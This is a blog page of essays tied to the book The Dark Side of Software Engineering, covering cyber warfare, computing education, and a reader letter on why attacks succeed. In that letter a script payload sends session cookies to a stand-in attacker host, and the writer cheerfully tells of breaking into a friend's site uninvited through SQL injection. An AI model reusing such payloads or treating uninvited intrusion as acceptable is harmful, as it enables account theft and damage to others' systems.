The Dark Side of Software Engineering

Web Extras by Johann Rost and Robert L. Glass

The views expressed in this blog are solely those of the bloggers and do not represent official positions of the IEEE, the IEEE Computer Society, the IEEE Computer Society Press, or John Wiley & Sons.

Headlines in Cyber Warfare

by Robert L. Glass

US Engages in an Instance of Cyber War

At the same time I was reviewing the book Cyber War, news came out that the US government has been engaging in cyberattacks on Iran. The attacks are designed to destabilize and undermine the Iranian nuclear program, which the West believes is intended to produce nuclear weapons, by such means as disrupting the operation of 1000 to 5000 Iranian centrifuges. It is thought that the Iranian efforts may have been set back 18 months to two years by these cyberattacks, which began under President George W. Bush and have continued under President Barack Obama, according to news sources.

The cyberattack program was, of course, secret, but it became detectable because of an error in the latest version of the cyberattack code.

Note also that the US cyberattack against Iran is described in the 2012 book Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power by David E. Sanger. That book is apparently the source of the latest news reports about US policy described above; it was cited as such on the US news program PBS NewsHour in a June 7 interview with the author.

I have not read this book, nor do I intend to review it, since it is less about computing than about American policy. Note that although the book’s title implies that the cyberattack is an Obama policy, the news story derived from the book says the cyberattacks are a continuation of a George W. Bush policy.

Computer Scientists Are Asked to Consider Cyber War

While there is all of this interest in Cyber War, we begin to hear from another constituency on this subject. In one of computing’s leading publications for both theorists and practitioners, Communications of the ACM (the June 2012 issue), there appears an article entitled “Why Computer Scientists Should Care About Cyber Conflict and US National Security Policy.” The title pretty well describes what the article is about, and we add here only the concluding paragraph from that article: “We are in the earliest stages of an ongoing policy debate about matters of war and peace in cyberspace, and the voice of professional computer scientists should be heard in that debate. Whatever one’s views on the topic, dialog and discussion within the computer science community about this matter can help policy makers make more informed decisions in this area.”

Google Becomes a Cyber War Combatant

At the same time that the notion of Cyber War has been attracting all of this attention, Google has announced that it is stepping into the fray.

The company announced, as of early June, that it will issue a warning if it believes that state-sponsored attackers may be attempting to hack into its users’ computers or accounts. The announcement did not state how Google would recognize such “state-sponsored” attacks, but it did suggest what the notified user could do about them -- update passwords, Internet browsers, and operating systems.

It is believed that Google intends to employ the same sort of mechanism it uses for spam detection to identify these attacks.

Cyber War: A Dark Side Book Review by Robert L. Glass

Cyber War: The Next Threat to National Security and What to Do About It

By Richard A. Clarke and Robert K. Knake
Published by Harper Collins, 2010


This is a deeply disturbing book on several levels:

On the first level, it postulates a serious security concern facing the United States that, it says throughout, the nation is ill-prepared to deal with.

Secondly, it presents lots of “facts” about that problem without any substantiating citations to support them.

Thirdly, it dabbles in the US political domain and tries very hard to seem relatively non-partisan -- not always with success!

So, what have we here? A book written largely by an American who has represented security concerns in both Republican and Democratic administrations over the past several decades. A book about what it calls Cyber War, a war fought not on traditional battlefields but in cyberspace, using techniques often attributed to hackers. And in that war, it discusses the fear that the US, although prepared to deal with such a war offensively, has taken almost no steps to fight that same war from a defensive point of view.

Let’s start with a bit about the author(s). Richard A. Clarke served as an advisor to Presidents Ronald Reagan, both George Bushes, and Bill Clinton. Although the book is frequently written in the first person, Clarke has a co-author (as noted above), so when the book speaks of “I” it is at first difficult to be sure who is speaking. Because those discussions tend to be about government matters, and ones that involved the first author, it becomes clear after a while that it is Clarke who is speaking.

Secondly, let’s talk about the War. Clarke’s concern is largely about other-nation-sponsored hackers who want to do destructive things to the cyber capabilities of the US, mostly denial-of-service attacks to disable such things as the US banking system, the US power grid, or even US military capabilities. He sees governments such as Russia, China, and North Korea as being behind most such attacks, even when the attacks appear to come from private citizens operating out of other countries. He even provides a ranking of world nations on what he calls “Overall Cyber War Strength,” using a rudimentary rating system that ranks North Korea, Russia, China, Iran, and the US (in that order) on offensive cyber war capability, defensive capability, and dependence on cyber systems (a country such as North Korea, which has little dependence on cyber systems, is particularly strong -- invulnerable, even -- in that category).

Thirdly, there’s that whole political domain thing. Basically, this book seems to be Clarke’s appeal to the public for support for concerns that none of the presidents for whom he served were willing to do anything about. Much of the book is spent telling of his battles to convince various administrations that something needed to be done to beef up our Cyber defenses. In a purely non-partisan statement, he says, “Many of the things that have to be done to reduce America’s vulnerability to Cyber War are anathema to one or the other end of the political spectrum” (he notes that some of those things would require government regulation, and others would require some violations of privacy). But sometimes his pent-up partisan anger boils over, as when he notes a particularly offensive opponent of his ideas and says, “Cheney, I’m thinking of you here!”

About the lack of citations. As someone used to reading material written by academics, I have come to appreciate their writing style, in which if you state a “fact” you must substantiate it with a citation to some source that allows you to state that fact with some confidence. Now there are, of course, a couple of occasions in which that approach does not work -- when no one has written about this particular subject previously (it represents original thinking), and when the source of the facts is the author himself or herself. And, to give the author of this book his due, both of those criteria could explain the lack of citations here. After all, much of what this author is discussing emerges from his time as a presidential advisor, where what was being discussed was quite likely being discussed both for the first time and by the author and his colleagues themselves.

The early parts of the book consist mostly of anecdotes of Cyber War attacks, and I found myself experiencing both of those disturbing reactions I mentioned at the beginning of this review -- these are really deeply scary stories, and, since they go uncited, are they really true? As the book went on, I overcame both of those early reactions for the most part, especially when I came to realize that much of the book is autobiographical.

There are some oddities in the book:

  • In a chapter that begins with stories of US “Cyber Warriors,” the book veers off to spend much of the chapter instead discussing China’s capabilities in this area and then concludes by saying that “the Russians are definitely better” about these approaches, without spending much time on specific Russian stories at all.
  • The author is clearly anti-Microsoft, pro open-source, and less knowledgeable about software creation than he should be. He tells stories of Bill Gates signing an agreement with the Chinese that would allow them to see and modify Windows operating system code (why would he, and why would China care?). Noting that errors in software leave open too many possibilities for Cyber War attacks, he concludes that we should produce error-free software and suggests achieving that by (a) using artificial intelligence to write such code and (b) having open source people write it (he obviously thinks open sourcers are superior to other programmers).

Where does the danger in Cyber War lie? The book mentions things like “stealing information, sending out instructions that could result in moving money, spilling oil, venting gases, blowing up generators, crashing trains and airplanes, and causing missiles to detonate.” He then elaborates on such doomsday scenarios. What should we do about this? As a first level of defense, the author advocates

  • protecting the Internet backbone (there is no need to protect any individual computers if the backbone is secure)
  • protecting the power grid
  • protecting DoD networks and systems

The book then presents the scenario for a Cyber War game between the US and China that relies on those approaches to de-escalate the conflict.

The book ends with another oddity: It proposes two US presidential speeches: one to the US military academies at commencement time, announcing a new doctrine of Cyber Equivalence, and then another to the United Nations advocating and in fact announcing a Cyber Network security plan.

I cannot recall ever reading another book that suggested what the US president ought to say on a particular subject in a speech and to whom it should be said.

Now, is this book important, and should you read it? In spite of its flaws, and my reactions to those flaws, I think the correct answers here are “yes” and “yes.”

(Note that this book and this review are written from a US point of view. What I identify here as “scary” might not be scary to someone from another country.)

The Dark Side of Engineering Education?

Poking around in the relevant literature, Johann and I came across a book that looks at Engineering education in a fashion that’s slightly similar to the way we’ve looked at Computer Science and Math.

The book is Stuff You Don’t Learn in Engineering School -- Skills for Success in the Real World, by Carl Selinger (Wiley/IEEE Press, 2004). What it addresses is engineering’s “soft skills” --  things like working in a team, setting priorities, being effective in meetings, speaking in front of a group, negotiating, dealing with stress, and even having fun (!).

Now, we would agree with the author of the book that these are important skills, particularly for engineers, who are often noted for being too techie and not very “soft.” And we are pleased that he has written a book that covers those topics.

But this is a different kettle of fish from what we are talking about. Our chosen subject is topics that academe should be teaching but is not. It is not academe’s role, I think, to teach these soft skills -- and most of us would probably agree. Certainly engineers (and, quite likely, the rest of us) need to learn these things, but academe is not the place for that to happen, or at least not in the curriculum of an otherwise highly technical degree.

So there is nothing Dark Side about Selinger’s book. It is worthwhile, and you may want to read it for yourself, but it doesn’t warrant any further discussion on this blog.

A Research Study on What’s Important in the Field of Software Engineering

It’s important, in discussing the Rost/Glass disenchantment with academic coursework regarding its relevance to practice, to mention the work of Timothy Lethbridge [Lethbridge 2000], published over a dozen years ago.

Lethbridge, a Canadian academic, set out to study this very topic as a research project back then. He used a 75-question questionnaire, distributed it to 186 practitioner participants in 24 countries (mostly in North America), and focused on the most important (from the point of view of practitioner desirability) and least important courses offered in academe.

This is what he found:

Most important topics:

  • Specific programming languages
  • Data structures
  • Software design and patterns
  • Software architecture
  • Requirements gathering/analysis
  • Object-oriented topics
  • User interfaces
  • Ethics and professionalism

Least important topics:

  • VLSI
  • Robotics
  • Differential equations
  • Chemistry
  • Laplace/Fourier transforms
  • Analog electronics
  • Artificial intelligence
  • Combinatorics

Summarizing what is overtaught and undertaught, Lethbridge says:

Overtaught

Calculus, differential equations, linear algebra, chemistry, and physics

Undertaught

The article provides no list of undertaught topics, but it draws this important conclusion: “Many of the... important topics are not extensively taught, and some unimportant topics are extensively taught. This suggests that the education that today’s computing professionals receive may not be entirely appropriate.”

Most respondents also said that they had forgotten what they learned about many topics, presumably because that knowledge had not since been reinforced by heavy usage. Most of that forgetting had happened in theory, mathematics, and the natural sciences.

The article concluded with subjects for which there was a “knowledge gap,” where the importance of a topic to practitioners exceeds their current knowledge. These included negotiation, user interfaces, leadership, real-time system design, management, software cost estimation, and a few others.

The bottom line here is this: Lethbridge’s study tends to support rather strongly the Rost/Glass impression of the relevance of academic coursework, at least in the software field. The gap between what is learned and what should be learned is far too large.

Reference:

Timothy C. Lethbridge, “What Knowledge Is Important to a Software Professional?” Computer, vol. 33, no. 5, May 2000, pp. 44-50. http://doi.ieeecomputersociety.org/10.1109/2.841783

Some New Thoughts from Prof. Lethbridge

by Timothy C. Lethbridge

Regarding my year 2000 study, I haven't personally done any follow-up, although it is on my medium-term agenda.

My article is cited by quite a lot of other papers, so it would be useful to give people an update to cite instead.

My finding that User Interfaces is the area with the greatest knowledge gap seems to have been well received. The topic became required in curriculum SE2004 for software engineering programs and is on track to be required for Computer Science programs in the 2013 update of the CS recommendations. People have told me that my paper is one of the influences that have led to this (directly or indirectly).

If I look back at the courses I took in University and the material I have learned since (out of need, or because I was teaching it), the following would be my words of wisdom:

1. Above all, doing well in SE requires “practice, practice, practice.” Simply doing a lot of development, with sufficient variety to keep developing new skills and learning new knowledge, is key. This suggests that courses should all require lots of programming coupled with design, and that some of that work should be individual; otherwise, a few team members tend to do it all.

2. There are some useful things that I think I would not have learned easily or well if I had not been forced to learn them in a classroom or in some other structured education/training setting. These include statistics (applied, not theoretical), user interface evaluation, algorithm analysis, data structures, design of class diagrams and normalized databases, aspects of linear algebra, logic, numerical methods and grammars, and certain core domain-specific concepts that are widely useful, such as basic accounting, economics, and other business concepts. All these should be in the core of an education program.

3. There is a lot of stuff that can be learned “on the job” and with quick training courses for employees to teach them specifics: much of requirements engineering, much of project management, much of software architecture, and specifics of any particular programming language or platform. A good “general background course” will be enough for most people to get the terminology of some of these topics, and the “practice, practice, practice” concept plus some targeted reading and short seminars will allow them to pick up what they need when they need it.

4. There is a bunch of material that falls between points 2 and 3. Developers may need it in specific contexts, and learning it on the job is less likely to happen, but once people have an awareness of their lack of knowledge, they can use self-study and more in-depth training courses to bring themselves up to speed while in the workforce. This includes real-time design, the full spectrum of testing techniques (for the person who wants or needs to become an expert), and a variety of other topics.

5. The world is moving toward more agility in development, and the tools and methods for this should be integrated harmoniously into educational programs, since they can help a lot of learning happen transparently: rapid release cycles, focus on the customer's problem, test-driven development, continuous integration, etc. -- all foster self-learning.

Timothy C. Lethbridge, PhD, P.Eng., I.S.P., CSDP
Professor of Software Engineering and Computer Science
University of Ottawa, Canada

The Dark Side of Computer Science Pedagogy

by Johann Rost

This blog post regarding our book The Dark Side of Software Engineering is at the fringe of that book’s subject matter. Most of the Dark Side material in the book is on the subject of writing software and the bad things that happen during that process. This blog post, on the other hand, is about the teaching of computer science as currently practiced in academe. Still, in my view at least, this is a legitimate dark side computing topic, because I think that what we learned in our CS courses -- that is, the inadequacy of what we learned -- could be seen as representing another dark side of our field.

Did we ever use what we learned in school?

Many years ago I graduated in Computer Science from a university in Germany. Looking back at the coursework of that school, I notice that I really only used in my professional career a ridiculously small fraction of the stuff I learned at that time:

I have never again implemented a compiler for an LR(1) language from scratch. Neither have I used the pattern recognition algorithms that were considered “advanced” at that time. I have not had to work on projects so close to the hardware that I had to worry about things like carry bits, trigger pulses, and shift registers. I certainly have never had to find out the minimum number of transistors necessary to implement a given Boolean function (in chip design). I remember Turing machines, fast-growing functions, and the fact that the differential equation for the strings of a guitar can be solved by separating the variables, but this material, like that mentioned above, has certainly never been used in practice. I could continue, but I think you get the idea.

It's hard to quantify how much I have used of all the stuff I learned in required CS courses, but it is a tiny fraction. It seems that the most important thing I took from my CS studies was my diploma. When I became aware of that, I felt, let's say, a “bit disturbed.” A quick survey among a few colleagues and friends revealed that their experience has not been much better than mine. Virtually none of the persons I asked had used more than, say, a quarter of the stuff learned during his or her computing studies -- and most of them had used much less than 10%.

Even more surprising: Although many colleagues have been through a similar experience, there is no loud cry of “ALARM.” I wonder, what’s going wrong here? Why is it virtually impossible to define a curriculum that can be reused in practice to a high extent -- say, at least 50%? And why is there no broad discussion of this problem?

Why does the CS degree have any value at all?

Let’s have a look at this pedagogy/curriculum problem from the point of view of future employers of CS students -- companies that hire computing professionals.

I suppose that these companies know that the persons who graduate from a CS degree program will use only an insignificantly small fraction of the stuff they have learned there. Despite this, having graduated from a CS program gives the candidate a competitive advantage over other candidates who have no such degree. I wonder why.

Why do companies prefer candidates who have a degree? What is the advantage of having graduated in CS -- since most of the knowledge learned there won’t be relevant in practice?

A personal anecdote

I don't want to close this section without sharing a personal experience that contributed a good deal to the motivation for writing this article.

When I was an undergraduate CS student in Germany, we had to take and pass a lecture with the innocent title “Logic.” You might think that therein we learned to draw “logical” conclusions. This, however, was far from the truth.

In this lecture we learned that there are some problems that have a solution and for which you can (mathematically) prove that the solution is valid (“solved problems”). For other (open, unsolved) problems, no such proof exists -- at least not yet. However, there is a third class of problems for which you can prove that no solution will ever exist. The famous problem of “squaring the circle” is an introductory example of this class: there is a mathematical proof that no one will ever come up with a solution.

A great deal of the lecture covered this “interesting” third class of problems. For example, these problems can be ordered according to their difficulty. All of them are unsolvable, of course, but some of them are more difficult -- more “unsolvable” -- than others. If this concept sounds strange to you at first glance, don't worry: you get used to it in time.

These proofs that a problem can never be solved are anything but easy. How do you prove such a thing? Perhaps in 300 years a genius will come along with a completely new idea, find a solution, and prove it. Yet despite their difficulty, such impossibility proofs are possible, and we learned quite a few of them.
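
For readers who have never seen this kind of argument, here is a minimal sketch -- in Python rather than in the formal notation we used, and with names that are purely illustrative -- of the best-known example of that third class, the proof that no general halting checker can exist:

    # A sketch of the classic diagonal argument (the halting problem).
    # The names halts() and paradox() are hypothetical, not a real library.

    def halts(program, argument):
        """Hypothetical oracle: True if program(argument) eventually stops,
        False if it runs forever. Assume, for contradiction, that someone
        has actually implemented it correctly."""
        raise NotImplementedError

    def paradox(program):
        """Built directly on top of the supposed oracle."""
        if halts(program, program):
            while True:      # oracle says "halts" -> loop forever
                pass
        else:
            return           # oracle says "loops forever" -> halt at once

    # Now ask: does paradox(paradox) halt?
    # If halts(paradox, paradox) returns True, paradox(paradox) loops forever;
    # if it returns False, paradox(paradox) halts. Either answer contradicts
    # the oracle, so a correct halts() cannot exist.

Nothing in the sketch depends on Python; the same contradiction can be set up in any programming language or machine model, which is exactly what makes the result so general.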

As the lecture advanced, the professor did not give us any more specific proofs for certain problems, but broadened the view and showed us methods for constructing “proofs of non-existing proofs” in general -- we went to the next level of abstraction.

The feeling when I passed the exam was beyond words -- like crossing the Antarctic. If you survive this, you won't catch a cold in windy Chicago any more. Unfortunately, not all of us survived. Of the three hundred students who tried the exam, fifteen of us passed. Those who failed this obligatory exam could repeat the test a couple of times. However, quite a few of my colleagues finally had to give up and leave the university because they simply could not get their brains around this stuff.

The anecdote is based on the specific situation in my school at the time when I was a student, so it certainly cannot be generalized. Some teachers with good reputations in their research fields had very few restrictions regarding the curriculum -- so they taught us whatever they considered really essential in life.

It was a bizarre lecture. However, let's step back and look at the problem from some distance. Given that students use almost nothing of what they learned at university in real life, does it really matter whether they spend their time on one single extraordinarily difficult lecture or on ten lectures of moderate difficulty? Either way, in the end they will have spent a couple of years and will take nothing with them but their graduation document. This bizarre lecture only highlights the general and widespread problem by driving it to the extreme.

What's your experience?

This blog post is largely based on my personal experience and opinions. I did not conduct a study of this topic, nor do I have special knowledge of curriculum design.

However, the fact that I and many of my colleagues can use almost nothing of what we learned at university disturbs me. So I invite readers to share their own experiences and opinions on this topic.

The Dark Side of Mathematics Pedagogy

by Robert L. Glass

Let’s stretch this whole matter of the dark side’s relationship to pedagogy even further than my co-author of the Dark Side book, Johann Rost, has done above.

Until Johann wrote his article, I had no idea how he felt about his computer science education. But what makes this addendum of mine at least mildly interesting is that I, independently, felt the same way about my education. Except that mine was in Mathematics!

Here’s my experience.

My undergraduate college was a very small one, with very few choices. I majored in Math there, and felt somewhat good about that (although I was never quite sure what profession one could go into with a Math degree). I was a big fish in that small pond, graduating Summa Cum Laude and wondering if I was sufficiently prepared and/or bright enough for the graduate school I had chosen to attend.

I went on to graduate school in Mathematics, choosing the University of Wisconsin as the place to do so because it had an excellent reputation in the Math field. But there was something important that I didn’t know at the time. Academically, Math divides itself into two fields -- Pure Math, for people who love Math for Math’s sake, and Applied Math, for people who want to use Math to solve problems in other fields. I quickly discovered that Pure Math wasn’t the field I wanted to go into.

Time passed, and so did I, but without the distinction I was used to in my smaller college. I decided I wasn’t cut out for the PhD I originally thought I was studying for and found a job in industry, in the suddenly burgeoning computing field, into which I found I fit comfortably immediately. There is an old joke that all programmers believe they’re the world’s best (I strongly believe that’s why Open Source programmers trumpet that viewpoint about their own work so frequently), and I can certainly relate to that, since I immediately thought I was a considerably-above-average programmer! (That reminds me of another joke, in which the residents of the fictional town of Lake Wobegon, Minnesota, believe all of their children are above average!)

In any case, when I joined industry (where I became part of the also-burgeoning space industry), I quickly found that my education (in Pure Math, you recall) had not in the slightest prepared me for the work I was going to be doing. Actually, that’s not quite true. I had taken the only two courses Wisconsin had in working with computers (this was 1952, and the whole computing thing and the whole space thing were both brand new), and those were superb preparation for the work I was to do. But none of my Math applied. At all. 0%.

Which is kind of weird, because my job assignment was in Master Dimensions, where we mathematicians (!) used our skill to define the aircraft our company was building in mathematical terms. We measured things to a ten-thousandth of an inch, so that when the airplanes flew the pieces would fit together so well that no excess air turbulence would cause bad things to happen. We Master Dimensions folks felt exceedingly useful (although, knowing what tolerances we were working to, we were always dismayed when we observed shop floor workers banging on pieces to make them fit together -- we knew, in our hearts, that they would slip together astonishingly well without the banging!).

Now the kind of Math we were working with here was 3-dimensional geometry. And if you know Math curricula at all, you’re no doubt aware that that’s a subject that almost no one teaches. And certainly not a school that focuses on pure math.

The more I thought about it, the more I realized that my Math studies had prepared me for almost nothing I was doing on the job, even though I was, nominally, a Mathematician! I began to realize that what my college education had been good for was a ticket of achievement, called a degree, that showed I was bright enough to learn new things, perhaps even Master Dimensions work! It turns out that I wasn’t all that good at Master Dimensions work, either, and I quickly changed fields to go full time into software work, where of course I immediately became the world’s best programmer (like all of my colleagues).

So there you are. Putting Johann’s two cents’ worth with mine, one could begin to wonder about the value of a college education. I’m not saying, and I don’t think Johann is saying, that the education -- or the degree -- wasn’t worthwhile. It’s just that I have the suspicion that it could have been so much more valuable if the academics who taught my courses had (a) known I was going to be an applied mathematician, and (b) had any idea what real-world problems actually looked like.

All of this makes me wonder if the feeling that your education didn’t properly prepare you for your professional work is universal. Perhaps it’s not CS education, or math education, that’s the problem here. Perhaps it’s academe in general. Perhaps there’s just a huge gap between the academic view and the professional view in all (or nearly all) disciplines? That makes it all the more important that you communicate with us. Did your education, no matter what its flavor/major, serve you well in being job-ready? We’d love to hear from you.

Q and A

For this entry, we share the space with a letter received in response to the book:

Hello. I recently read your book on The Dark Side of Software Engineering. It was very enjoyable and caused me to reflect upon various encounters with such issues, both within and outside software-related endeavors. In particular, I was interested in replying to a question posed at one point:

"Why is it that rank computing novices can interact with (or work against) the highest level professionals in our field to cause the kind of mischief that they do?"

I think that this problem comes down to defenders having to secure all possible approaches, while attackers need only discover a single weakness or a chain of weaknesses to succeed. In addition, attackers need not have sophisticated programming skills to succeed -- others can develop the tools for them. This essentially allows for the faster sharing of knowledge between attackers, thus raising the apparent level of even an amateur. That combines with the idea that systems tend to be built upon a common set of components. Attackers may develop a technique that opens up thousands of different systems to the same attack because they share a common weakness (e.g., SQL injection afflicted many different websites precisely because they were all built upon SQL databases). The defenders would appear to be at a disadvantage.

There are several factors that contribute to the prevalence of vulnerabilities:

The majority of developers seem to have no security knowledge or to believe that security is outside the scope of their applications. Therefore, they develop components that may have security vulnerabilities, but there are no checks in place to detect them. A developer may even be aware that there are circumstances under which code fails dramatically, but he may consider that it's reasonable for the component to fail if misused. In time, that vulnerable component may become part of a much larger system that is critical. Even though much of the system may have been vetted, perhaps the vulnerable component was not. The security of the whole is weakened simply by the inclusion of a vulnerable part.

As an example, several years ago, a friend developed a website that included a feedback form. I noticed that the form would fail when the feedback included an apostrophe, and the site displayed an error message. He remarked that he would fix it later, that it was "the user's fault" if the form failed. It dawned on me that perhaps SQL injection would work on his site. I knew nothing about SQL at the time, but I'd read a two-sentence snippet in some magazine about SQL injection being a widespread issue at the time. He responded to my warning by saying it was impossible to exploit such a thing. Needless to say, he had underestimated my motivation to prove him wrong. I spent the rest of the night reading about SQL from websites and writing queries into his feedback form. By the time he was awake the next morning, I'd managed to place files on his server. I'd also mangled his database tables, but that was a forgivable accident...
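
For the curious, the core of the problem fits in a few lines. Here is a minimal sketch (the table and function names are invented for illustration) of the difference between the kind of query my friend was building and the parameterized form that would have been safe:

    import sqlite3  # any SQL database behaves the same way here

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE feedback (id INTEGER PRIMARY KEY, body TEXT)")

    def save_feedback_vulnerable(text):
        # The statement is built by string concatenation, so a single
        # apostrophe in `text` breaks the query -- and a crafted value
        # can change the meaning of the query entirely.
        conn.execute("INSERT INTO feedback (body) VALUES ('" + text + "')")

    def save_feedback_safe(text):
        # A parameterized query: the driver treats `text` purely as data,
        # so apostrophes (and injection attempts) are harmless.
        conn.execute("INSERT INTO feedback (body) VALUES (?)", (text,))

    save_feedback_safe("it's fine")                # works
    try:
        save_feedback_vulnerable("it's broken")    # the apostrophe symptom
    except sqlite3.OperationalError as error:
        print("query broken by user input:", error)

The visible error message is only the symptom; the same concatenation lets an attacker supply input that rewrites the query itself, which is what I was doing through his feedback form that night.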

Sometimes weaknesses arise from components interacting in unexpected ways, or from the expansion of components' roles. Perhaps the overall system was secure for its original purpose, but an expanded role renders it vulnerable. Consider the case of Social Security numbers in the United States. The designers of SSNs never intended for them to be secret universal IDs. As such, they were assigned following a set of rules which makes it much easier to guess a person's SSN given the right information. Worse still, it's information that tends to be publicly available. It wasn't until researchers published a paper on this that the Social Security Administration decided to change the rules; future numbers will be assigned randomly.

An example more relevant to computing would be how introducing new browser functionality affects old systems. Perhaps a forum was designed so that users could post fancy HTML content on their signatures. This allows JavaScript tags to be inserted, which in turn exposes session cookies to an attacker. Even after developers secure the forum against JavaScript, future changes to HTML might open up new attack routes. Future-proofing systems can be very difficult.
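
To make the forum-signature case concrete, here is a minimal sketch in Python (the rendering functions and the attacker URL are invented for illustration); the defense shown is simply escaping the user's markup before it reaches the page:

    import html

    def render_signature_unsafe(signature):
        # User-supplied markup is inserted verbatim: a signature containing
        # a <script> tag would run in every reader's browser and could send
        # the reader's session cookie to an attacker.
        return "<div class='signature'>" + signature + "</div>"

    def render_signature_escaped(signature):
        # Escaping turns the markup into inert text before it reaches the page.
        return "<div class='signature'>" + html.escape(signature) + "</div>"

    sig = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"
    print(render_signature_unsafe(sig))    # live script in the generated page
    print(render_signature_escaped(sig))   # harmless &lt;script&gt;... text

Escaping at the point of output, rather than trying to filter "dangerous" tags on input, is the design choice that tends to survive new browser features best -- though, as noted above, even that does not fully future-proof a system.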

Then there are instances of users rendering their systems vulnerable. Suppose that an administrator uses his work password as his password on a casual gaming website. The website has vulnerabilities because its owners are inexperienced and have no reason to believe security is particularly important. An attacker succeeds in obtaining the administrator's password through the forum, then uses it to access other accounts, eventually escalating his access to his desired target within the administrator's company. Sophisticated security measures are pointless when the users themselves fail.

--Humberto Diaz, PhD student, University of Puerto Rico at Mayaguez
(Reprinted with the author's permission)

Response from Johann Rost, first author of The Dark Side of Software Engineering:

Thank you for your response and for your suggested explanations of why it appears to be so easy for attackers to crack even highly protected sites. I have read this idea before: the defender must be right all the time, while it is enough for the attacker to be right only once. I am not a professional in computer security; however, I am not fully convinced by these explanations.

Defenders face this problem wherever security systems are applied: in places where gold and other precious things are kept, for example, or in prisons. There, too, it is enough for attackers to be right only once, yet we rarely read stories of a group of teenagers entering Fort Knox, arranging the gold bars into funny sculptures, and leaving cheeky remarks on the walls. Such things really do happen only rarely -- compared with the frequency with which teenagers and other persons with limited formal training in computing have entered highly secured sites, like those of Cisco or networks owned by the US Army.

Well, it's true that the attackers need to be right only once. The defenders, however, compensate for this problem by being in complete control of the access conditions.

So, my question still remains unanswered: What makes the difference between computer security -- where high school students simply embarrass the best professionals in the field -- and other areas protected by security systems? Is it the anonymity of the Internet? Is it the complexity of the protected systems? The huge number of intrusion attempts that go completely unpunished, without any consequences for the attacker? Or what?


About the Book

The Dark Side of Software Engineering

Evil on Computing Projects

 

by Johann Rost and Robert L. Glass

Betrayal! Corruption! Software engineering?

Industry experts Johann Rost and Robert L. Glass explore the seamy underbelly of software engineering in this timely report on and analysis of the prevalence of subversion, lying, hacking, and espionage on every level of software project management. Based on the authors' original research and augmented by frank discussion and insights from other well-respected figures, The Dark Side of Software Engineering goes where other management studies fear to tread -- a corporate environment where schedules are fabricated, trust is betrayed, millions of dollars are lost, and there is a serious need for the kind of corrective action that this book ultimately proposes.

IEEE CS MEMBERS: Use promotion code 38491 when you check out at Wiley.com to receive your 15% member discount.

ISBN: 978-0-470-59717-0
Paperback
305 pages
$34.95 (15% member discount available)